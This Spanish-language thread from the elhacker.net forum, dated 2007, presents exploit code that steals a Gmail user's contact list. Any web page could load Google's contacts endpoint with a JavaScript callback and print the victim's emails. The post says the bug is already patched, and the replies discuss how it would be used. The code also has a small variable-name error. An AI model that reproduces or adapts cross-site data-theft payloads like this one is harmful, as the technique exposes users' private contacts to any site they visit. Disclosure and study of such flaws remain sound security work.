elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 12:46  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Gmail: Robar Lista de Contactos		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Gmail: Robar Lista de Contactos  (Leído 6,251 veces)
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Gmail: Robar Lista de Contactos
« en: 1 Enero 2007, 16:36 »
Se ha descubierto un nuevo bug que permite ver la lista de usuarios que tiene uno en gmail. El problema se debe a que Google guarda esta informacion en un javascript luego de que nos logueamos y cualquier web puede llamarla.

Fuente: Digg.com

Codigo Fuente de Exploit:

Código:
<script type="text/javascript">

function google(a){
    var emails;
    emails = "<ol>"
    for(i=0;i<a.Body.Contacts.length;i++){
        mails += "<li>"+a.Body.Contacts[i].Email+"</li>";
     }
 emails += "</ol>"
 document.write(emails);

}
</script>

<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999"></script>

Bug parchado ya.
« Última modificación: 2 Enero 2007, 17:21 por Crack_X » En línea
Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
SergioDS

Desconectado Desconectado

Mensajes: 29



Ver Perfil
Re: Gmail: Robar Lista de Contactos
« Respuesta #1 en: 1 Enero 2007, 17:13 »
y como se hace para usar ese xploit? XD
En línea


"Solo Existen 10 tipos de personas, las qe conocen el binario y las que no"
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Gmail: Robar Lista de Contactos
« Respuesta #2 en: 1 Enero 2007, 17:17 »
Hasta el momento creo que solo se le podria sacar provecho mediante un XSS. No conozco un XSS en gmail pero no significa que no existan.
En línea
Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Gmail: Robar Lista de Contactos
« Respuesta #3 en: 2 Enero 2007, 02:53 »
No se necesitaba de un XSS, simplemente ponias el codigo y los contactos aparecian.. lo mismo paso hace unos meses y denuevo otros 2 meses atras con el mismo tipo de vulnerabilidades.. el uso se AJAX aveces es muy peligroso.. :P

Saludos!!
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Google amplía Gmail para poder guardar hasta 25.000 contactos
Noticias 		wolfbcn 0 181 Último mensaje 9 Mayo 2011, 12:28
por wolfbcn
Gmail actualiza los datos de los contactos e introduce mejoras en su correo
Noticias 		wolfbcn 0 360 Último mensaje 19 Mayo 2012, 17:59
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines